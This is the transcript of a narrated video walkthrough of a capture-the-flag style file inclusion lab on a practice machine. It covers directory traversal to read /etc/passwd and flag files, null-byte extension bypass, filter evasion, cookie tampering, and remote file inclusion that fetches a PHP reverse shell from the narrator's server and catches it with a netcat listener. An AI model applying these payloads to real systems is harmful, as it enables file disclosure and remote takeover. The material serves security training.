Welcome back everyone. Today we will be talking about file inclusion vulnerability. So let me start by saying that you have to first deploy the machine, click on start machine, you will get the IP address and you can start answering the questions from task 3 all the way to task 8. Alright, so task 3 we have one question, right? Before doing that, let's copy the IP address and navigate through the browser. So purpose suite is off. Let me re-establish the connection to the network. Okay, and then gonna again try and access the server. So upon opening the page, we have around 6 labs and 1 playground. We will go over all of these labs, and throughout these labs, we will go over various scenarios of uncovering and exploiting file inclusion vulnerability. So let's go to lab 1. Click on lab 1. So in lab 1, we have a form, right, where we submit a file name. The file name should be appended with a PHP extension. As you can see, for example, welcome.php is an example. So let's go with the form and type welcome.php. Include current path. This is var html, which is the path of the web server. Here, file content preview of welcome.php. This is the content of the welcome file. Now, if you look at the browser, let's make some zoom. I guess this is better. So let's look at the URL here. So in the URL, we have lab1.php, which is the PHP file, and then we have file. File is the parameter, and then welcome.php is the resource that is being handled by the file parameter. So basically, file inclusion vulnerability is all about trying to access other files on the system. So we know that the handle here, or the parameter file, is used to access resources on the file system. The allowed resources on, or in this case, is the welcome.php file. So what if we would like to access other resources on the file system? So the simplest form of file inclusion vulnerability is to remove this file and refer the parameter, or make the parameter file here refer to other resources on the system. An example would be viewing sensitive information such as etc passwd. So as you can see, we were able to reveal the content of a sensitive file. This is a very primitive and simplest forms of file inclusion vulnerability. This is an example of a website that you could see in the 80s or in the 70s, right? It is there is no filters, there is no checking, there are no permissions, there are no validation on the user inputs. Completely vulnerable site. That's kind of site you would see in the 80s or in the 70s, as I said earlier. You wouldn't find this kind of websites or vulnerabilities in the web now. But we start off with these kind of scenarios to illustrate the vulnerability and how to understand the mechanism behind it. So as you can see here, we aim to, much like SSRF that we talked about in the last video, we spot the parameter here and we see what is the parameter used for. So in this case, it's used to refer to files on the web server directory. So it means we can make the parameter, right, refer to other files in the system, such as sensitive documents, which marks the answer for the first question. So task 4, we have give lab1 a try to read etc password. What would be the request URL? This is the answer. In lab 2, what is the directory specified in the include function? So let's go to lab 2. We finished lab 1. Go to lab 2. So in lab 2, we have, seems like we have the same structure. We have PHP file, lab 2, and here a form to include a file name. So if we type welcome.php, we see the content or the output is similar to the one we saw in lab 1. Welcome to THM, and here is the directory of the web server. Now, in any scenario where you are trying to uncover a vulnerability, you must first try the wrong input. So here we've supplied the right output. The expected output by the server is you supplying a welcome file or a file that exists in the server. So what if we supplied a file that doesn't exist? For example, if we type hi.php, hi, just type hi. The file actually doesn't exist. So the server throws an error, right? Saying here, warning, includes hi.php. So as you can see, based on the output, the web server is outputting the files or looking for the files you supply in the includes directory. So the include function looks for the files in the includes directory. If it finds a match, it just prints the content of the file. If it doesn't find a match, it throws an error. And this is the kind of error you see if the file doesn't exist. So as you can see here, the lab2.php exists in the web server directory, and the server is actually including or using the include function to retrieve files from the includes directory. So lab2.php contains the include function, okay, which retrieves files from the includes directory, includes/hi.php. So answering the question here, what is a directory specified in the include function? It is includes. Okay, next task. So next task, we go to lab 3, 4, 5, 6. All right, so how about we exploit this? Even if it's not required, let's try to type etc password. So we couldn't do that. As you can see, includes //etc/password, which means it couldn't find or it couldn't retrieve the file because we added an extra slash here. What if we canceled the extra slash here and only type etc/password? So here also etc/password doesn't exist. All right, so what you can do here, I'm going to walk you through this. You can just use directory traversal technique. So basically, you are in the web server directory here, right? So if you want to use directory traversal, you will have to go up in directories using the two dots //. So first, before deciding how many dots and slashes, first you have to understand where you are right now. We are here. So we go up. In order to escape out of this directory, we have to go up 3 steps, right? And 1 extra step to reach the etc directory. So what we do here, we type 1, 2, 3. We are out of the web server now, and another one to escape or to reach the etc directory. If you do that, you will be able to see the content of the etc password. So we have typed 4 ones. The first 3 ones just to escape the web server directory, and the extra one here is to move up 1 level to reach the etc directory. Okay, lab 3. What is required there? Try to read the etc password. What is the request look like? All right, so here we have a simple form, and here we supply, as you can see, file name. So if you type welcome without PHP, without any extension, current path, and this is the content. Let's supply wrong input, hi. So let's take a look at the error. The same here, we are at the web server directory. This is the PHP file, and here you see the include function. It looks for hi in the includes directory, and it also attaches or appends the PHP extension to the hi. So it didn't find it. Since it didn't find the hi.php, it threw an error. So what to do now? So basically what we can do here, in order to bypass this, as you can see, whatever we type in the box, the PHP extension is added automatically to the input we add in the form. So if we try to type here, for example, using directory traversal, etc password, it's not going to work. As you can see, why? Because the PHP extension is appended to the password file, and indeed there is no file called password.php. So how can we bypass this? Let me say, it's not a filtering mechanism, it's a kind of working mechanism, right? So what we can do, we can add the null byte. If we add the null byte after our inputs, we can make the web server ignore all of the characters that come after the null byte. Let's copy the null byte from here and try it. You see, we were successful in displaying the output of the password file. The null byte here, as I said earlier, makes the web server ignore all of the characters that come after the null byte, which means it's going to ignore the .php extension, and you will be able to print out the content of the file. As you can see, file extension is closely connected to directory traversal. So you have to understand how to move up in levels in the directory structure of the Linux file system. This is the answer for this question. Next one, which function is causing the directory traversal in lab 4? Now we're done with lab 3. Let's go to lab 4. So, question, which function is causing the directory traversal in lab 4? Okay, first let's do some experimentation. So we supply first a wrong output, hi.php. You have an error. As you can see here, we are under the web server directory, and the PHP file is lab4. The lab4.php contains the function file get contents, hi.php. So there is no specified directory here from which the function retrieves files, which means that it looks in the current working directory, which is var www.html. There is no hi.php, it threw an error. Now, if we want to display the content of the password file, again we try the directory traversal trick, etc passwd. You're not allowed to see source files. That's interesting. But if we, so basically this message means that there is some filtering mechanism behind the scenes, right? But it also means that we were able, or this is the right command to reach, or this is the right method to reach the etc password file. That's why we encountered this error message or the statement, right? So basically there is directory traversal vulnerability, there is file inclusion vulnerability here, and the function here, file get contents, is the vulnerable function. So this is the answer for this question. Try out lab 6 and check what is the directory that has to be in the input field. Okay, let's go to lab 6 now. What's the question? What is the directory that has to be in the input field? So this is an example, thmprofile / tryhackme.txt. This is an example where any parameter used in the URL equals to a directory / file. So let's type thmprofile /1.txt. So we are under the var www.html directory, and the lab6.php file handles the include function, which retrieves the files under the thmprofile directory. So that is the directory being asked in the question. Try out lab 6 and read etc os release. What is the version ID value? So here we're required to read a sensitive file on the system which contains information about the operating system. So now we knew that appending THM, or appending the directory from which the files are retrieved, is a necessary step in building your payload. So basically, any payload you will build, you have to include the THM profile, since it is necessary in retrieving files from the directory. So if we type something here like this, let me build the URL first and the box, so for those who are using mobile or cell phones can see the URL clearly. So THM profile, right? And now we type something like okay, so the question is etc release. Let's try to view this file. Let's try first to omit this one and try with the directory traversal trick. 3, 4, and type etc release 1, 2, 3, 4. That's fine. Copy the URL and put it here. Access denied. Allowed files at THM profile folder only. Okay. So let's add THM profile. So if we do it like this, let's see if we are able to access the etc release. And we are successful. And as I said earlier, it is very important to append the profile, the directory. So this is the operating system information, and this is the version. Version ID is this one. So that is task 5. Task 6 now. There is no required answer for task 6, but I'm gonna explain how to do remote file inclusion in the challenge. Remediation, no required answers. Challenge. Okay, now go to the challenge. So the challenge, you can access the challenge using this URL. So you have 3 challenges. Go to challenge 1. So challenge 1, capture flag 1 at etc/etc/flag1. Okay, so once we open challenge 1, we are presented with a statement. The input form is broken. You need to send post request with the file parameter. So normally when we add something here, we use get request, right? But the form will not work if we try the same. If we try with the same way we tried in the previous labs. So we have to use post request. So we can use post request either using perp suite by modifying the request, or we can use curl, which is my preferred way. So if we open a new terminal, and from here, so curl specify -x for the request post, and then we specify the URL. So basically now we specified the URL and we specified the request. Then -d, here we specify the data that we would like to post on the web application. So what we would like to do here, let's go back. The question is asking to read the content of the flag file, right? Okay. And also we have to change the method of the form. So if you right click inspect elements, you see the form. Where's the form? The form. Okay, this is the start of the form here. And okay, that's fine. So the method is get. We have to change this, and also we will change the file parameter. So we have 2 parameters, the file and the method. These data can be set here. So method equal get and file equal, let's type etc flag1 and give it a try. So if you read through the output, you see here file contents of etc flag1, and you get the flag1. So that's what you have to do. Just change the method to post and you can directly read the flag file. No need for any kind of bypass mechanisms. Challenge 1. Challenge 2 now. Go back to, so refresh the page please. Let's refresh the page. Welcome guest, only admins can access this page. So when you see restricted pages based on user credentials, it means you have to play either with the credentials or the cookies. So for that reason, I'm gonna turn on Burp Suite and refresh the page again to see what the request looks like. So we have a get request, and we have also cookie thm equal guest. So now if you change this to admin, you will be able to access the page. Forward. So now, as you can see, we are able to access the page, but that is not the end of the things. Here we display the content of the admin, welcome admin. This is an admin pop page, get the flag. The flag is etc flag 2. So what we can do now, we can refresh the page one more time and take a look at the request. So again, we are guest. Let's change that to, or let's now try to access the etc flag 2. Let's take a look at the error message. So we are under var www.html. The challenge file is chal2.php, includes a function, includes the include function, and which retrieves the files from the includes directory. As you can see here, everything went fine except two aspects. The first one, there is a PHP extension that is appended to the end of the file, and there is one extra slash here. So the first step in getting rid of these errors or these obstacles is first cancel the first slash. So type etc slash flag 2 and use the null character to bypass the extension filter. So let me look for the null byte. Let's take that and paste it here. Forward. Let's take a look. So now we get another error, but now as you can see, we were able to ignore the extension and we were able to cancel the extra slash. Now we have to do some sort of directory traversal. So let's refresh again and here type for, we move up 4 levels, etc pass, flag 2 and the null byte. Let's see if this works. And this is the flag. So that is the second question. Now the last one, or the third one, is kind of interesting. Capture flag 3 at etc flag 3. So let's cancel now Burp Suite temporarily and go to challenge 3. Challenge 3 now. Lab 3 challenge, include a file in the input form below. So it's expecting welcome. So let's break the logic and type hi. So this is a directory and this is the file handling the form, and here we have, or the file using the include function. It is retrieving files under the same directory, and it is also appending .php here. Right now, the regular method is, let's copy the URL, and here we use directory traversal, and let's type etc flag 3 and the null byte. Let me put the null byte here, I'm gonna need it. So flag 3, and we use the URL here. Let's see what's gonna happen. Okay, let's take a look. Now look at this. You see here the slash has been cancelled between the etc and the flag, and we still get the .php extension. So basically it means there is some kind of string filter here that's cancelling the slash and the dots. So what we can do here, we can just type extra 2 dots and 1 extra slash. The same here, 2 dots, extra slash, 2 dots, extra slash, 2 dots, extra slash, and try now. Why we do 2 dots and 1 extra slash? Because the web application is using a filter that cancels everything once it sees 2 dots. It's going to cancel everything, right? So the end statement will be only etc flag. So we used extra 2 dots so that once the 2 dots are cancelled by the application or omitted by the application, we have another 2 extra dots that protects the payload. So we try this one, and we see the same output. Okay, I think it's time to try a post request. So here, let's use this one. Use the same payload actually. I'm going to use the same payload, but the method will be post. See if this is going to make a difference. Here it will be method equal post, and the URL will change to 3. Try this one. Dash dash output. All right, let's take a look at this. So the post request worked. As you can see, the include function now is trying to retrieve this file. And as you can see, there is no changes on our payload, which means that the only trick that we should have done is changing the request or the request method from get to post. Now, the same payload, what we would do here, we would just cancel the extra slashes, 1 here, 2 dots, also we have 1 here, 2. So let's see if this will work. And as you can see, this is a flag. So conclusion here, as a conclusion, there is no filtering on the application. The only thing you have to do is to change the method to post, but it didn't say that out loud here that you have to use post request. It is left to your instinct to discover that. All right, so let's now move to the last question. Gain RCE in lab playground/playground.php with RFI to execute the hostname command. What is the output? Okay, now we go to remote file inclusion. So now go back to the main page, playground. So include a file in the input form below. Okay, hi. So include, hi doesn't exist, no such file or directory. So remote file inclusion is about changing the value of the parameter here so that the parameter equals to a URL on your server. An example would be retrieving content from your server and download that content to the target machine, and also executing that content. An example would be reverse shells or text file, whatever you want to execute. So what's going to happen in the remote file inclusion? Let's take an example. If we put here, hey, http domain.com/shell.php. That is remote file inclusion. Now you make the web server the target one. The include function here, what it will do, it's gonna take the URL, make the request to domain.com/shell.php, retrieves the shell.php, downloads the file to the target machine, and execute it. That's the danger of include functions without input validation. So now what we will do here, we will go to our machine and start a web server. Okay, let's split the view here, and now we create a simple PHP file, right? It could be reverse shell, it could be any kind of file you would like to execute. A simple example to start off is a text file. This text file is is written and made based on the challenge. So nano CMD or cat CMD based on the challenge requirements. So here it contains a PHP code that will execute the hostname command. So now what's going to happen, I'm going to go back and replace the URL with my own machine IP config, one more time. No. Sorry. Actually, I'm confused that with Windows. So now we take that, change the domain.com to IP. Don't forget the port. And here cmd.txt. Now this is your payload. Take that and enter. So this is the hostname, right? Now one more advanced step is to gain remote access to the machine. It's not required by the challenge, as you can see, but I'm gonna do that as a bonus on this video. So ls, now let's go back and go to the repo directory, go to web shell tools, cd web shell. Do I have the web shell? PHP web shell. So I'm gonna upload PHP reverse shell. All right, I'm gonna start a Python server. Yes, it's already in use. That's fine. I'm gonna cancel this one and start it at the same directory where the PHP reverse shell exists. Okay, now let's take this one. And before doing that, let's start a listener on my machine. So the listener could be here, nc.lvp 4555, and hopefully we'll receive now a remote shell. So replace the cmd.txt here with the file name. Check it out, and we have now remote access on the machine. ID, we are the www data. cd var and these are the challenge files. cd home, no users on the system. All right. I hope the explanation was comprehensive and thorough, and don't forget that I will be adding also the notes here to the channel. And also, if you want to have the notes, don't forget to subscribe to the channel membership. Thank you very much, and see you in the next video.